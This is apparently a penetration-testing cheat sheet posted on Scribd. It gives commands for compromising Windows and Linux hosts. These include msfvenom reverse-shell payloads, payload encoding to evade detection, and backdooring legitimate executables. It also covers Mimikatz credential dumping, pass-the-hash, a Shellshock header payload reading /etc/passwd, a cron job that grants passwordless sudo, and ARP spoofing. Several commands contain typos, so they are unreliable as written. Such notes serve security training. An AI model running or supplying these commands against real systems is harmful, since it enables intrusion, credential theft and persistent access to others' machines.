Scribd
Upload
116 views4 pages

Host Pentes

This document summarizes techniques for exploiting frequently targeted Windows and Linux services and systems. It covers exploiting services like IIS, SMB, RDP, and WinRM on Windows as well as Apache, Samba, and SSH on Linux. It also details post-exploitation techniques like privilege escalation, credential dumping, and payload delivery on both platforms. Network analysis tools like tcpdump and tshark are also summarized along with integrating exploitation and post-exploitation into the Metasploit framework.

Uploaded by

Togrul Asgerli
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
116 views4 pages

Host Pentes

This document summarizes techniques for exploiting frequently targeted Windows and Linux services and systems. It covers exploiting services like IIS, SMB, RDP, and WinRM on Windows as well as Apache, Samba, and SSH on Linux. It also details post-exploitation techniques like privilege escalation, credential dumping, and payload delivery on both platforms. Network analysis tools like tcpdump and tshark are also summarized along with integrating exploitation and post-exploitation into the Metasploit framework.

Uploaded by

Togrul Asgerli
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 4

Frequently Exploited Windows SErvices

Micrososft IIS
WebDav
SMb/CIFS
RDP
WinRm

Microsoft IIS and WebDav exploiting techniques

Tools: davtest,cadaver
nmap -sV -p 80 --script=http-enum $IP (enumareting webdav)
hydra -L userlists -P passlists $IP http-get /webdav/ (brute force for webdav
credentials)
davtest -auth bob:password_12121 -url http://$IP/webdav/ (for connecting)
cadaver http://$IP/webdav (connecting to webdav)

Exploiting with metasploit:


msfvenom -p windows/meterpreter/reverse_tcp LHSOT=$Local_IP LPORT=4444 -f asp >
payload.asp (creating reverse payload with msfvenom)
using cadaver upload this file to webdav
msfconsole > use/multi/handler > set payload windows/meterpreter/reverse_tcp > set
LHOST > set LPORT > run
Microsoft SMB exploiting techniques
User Authenticaion
Share Authentication
tools: PsExec alternative of telnet,metasploit
psexec.py username@ip cmd.exe
nmap -sV -p 445 --script=smb-vuln-ms17-010 $IP (eternal blue vulnerability check)
RDP exploiting techniques
Tools: metasploit framewrok,hydra
auxiliary/scanner/rdp/rdp_scanner
xfreerdp /u:username /p:password /v:$IP:Port
BlueKeep vulnerability

WinRM exploiting techniques


Tools:crackmapexec,evli-winrm (getting shell from enviroment),metasploit
crackmapexec winrm $IP -u username -p wordlists for passwords (cracking winrm
credentials)
crackmapexec winrm $IP -u username -p password -x command (execute command on
target system)
evil-winrm.rb -u username -p password -i$IP (access target system)

Windows privilige escalation techniques


Kernel exploits
tools:windows exploits suggesters,sec wiki,metasploit
getuid,getprivs,getsystems
use post/multi/recon/local_exploit
set session num
run
UAC(user account control) exploit
Tools:UACME
pgrep explorer
migrate $ID
net localgroup administrator
msfvenom -p windows/meterpreter/reverse_tcp lhost=$IP lport=$POrt -f exe >
backdor.exe
Access token impersonation
Impersonate-level token
Delegate-level token
SeAssignPrimaryToken
SeCreateToken
SeImpresonatePrivlige
Tools:incognito meterpreter
load incognito
list_tokens -u
impersonate_token "USERNAME"

Windows credentials dumping techniques


Unattended windows setup utility paths: C:\Windows\Panther\Unattend.xml,C:\Windows\
Panther\Autonattend.xml
certutil -urlcache -f $URL $FILE (downloading file with cmd)
search -f Unattend.xml (searching in meterpereter)
Dumping credentials with mimikatz
load kiwi
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
privilige::debug
lsadump::sam
lsadump::secret
sekurlsa::logonpasswords
Pass-The-Hash Attacks
kiwi and hashdump
search smb psexec
Exploiting Linux Services
Frequently exploited linux service:Apache Web Server,ssh,ftp,samba

Exploiting Apache Server(shell sock vulnerbalitiy)


nmap -sV $IP --script=http-shellshock --script-args
"http-shellshock.uri=/gettime.cgi"
User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
Exploiting Linux Samba sevcie
Tools:enum4linux,smbclient,hydra,smbmap
smbmap -H $IP -u username -p password
smbclient -L $IP -U username
enum4linux -a $IP
Linux Privilige escalation

Escalation with cron jobs


cd /
grep -rnw /usr -e "/home/student/message"
printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> etc/sudoers' >cronjobs
Network based attacks
Types: ARP,DHCP,SMB,FTP,TELNET,SSH
nmap $IP/subnet -sn
Tshark
thsark -r $File -z io,phs -q (protocol hireacy)
tshark -r $File -Y 'http' (filtering http traffic)
thasrk -r $File -Y 'ip.src==$ip && ip.dst==$ip' (filtering based on ip)

tshark -r $File -Y 'http.request.method==GET' (filtering for get request)


tshark -r $File -Y 'http.request.method==GET' -Tfields -e frame.time -e ip.src -e
http.request.full_uri (add fields)
tshark -r $File -Y 'http contains password' (finding password header in request)
http.host, http_cookie ip contains amazon.in http.user_agent
ARP Spoofing
echo 1> /proc/sys/net/ipv4/ip_forward
arpspoof -i eth1 -t 10.100.13.37 -r 10.100.13.36
Wifi `traffic analysis

Importing nmap results to metasploit


Using -oX flag give output of nmap scan as xml file.
db_import $filename
hosts
services
Metasploit Auxiliry Modules
run autoroute -s $IP
udp_sweep
search type:auxliriry name:ftp
http_version,http_header,robots_txt,dir_scanner,file_dir,http_login,apache_userdir_
enum
mysql_enum,mysql_version,mysql_sql
ssh_enumusers
db_autopwn,analyze,vulns
load wmap,wmap_sites -a $IP
Generating payload with mfvenom
msfvenom -a x64 windows/x64/meterpreter/reverse_tcp LHOST=$IP LPORT=$Port -f exe >
payload64.exe
msfvenom -a x86 windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$Port -f exe >
payload86.exe
msfvenom linux/x64/meterpreter/reverse_tcp LHOST=$IP LPORT=$Port -f elf > payload64
Encoding payloads
mfsvenom -p windows/meterpreter/reverse_tcp LHOST=$Ip LPORT=$Port -e
x86/shikata_ga_nai -f exe> encodex86.exe
-i 10 (10 iteration encoding)
Injecting payload to portable executables
mfsvenom -p windows/meterpreter/reverse_tcp LHOST=$Ip LPORT=$Port -e
x86/shikata_ga_nai -i 10 -f exe -k -x $PathofPE> encodex86.exe
-k(keep originial functionality of PE)
Automate metasploit with resource script
wim handler.rc
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $IP
set LPORT $PORT
run
(Save)
mfsconsole -r handler.rc
vim portscan.rc
use auxiliary/scanner/portscan/tcp
set RHOSTS $IP
run
(Save)
mfsconsole -r portscan.rc
resource $pathofscript

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy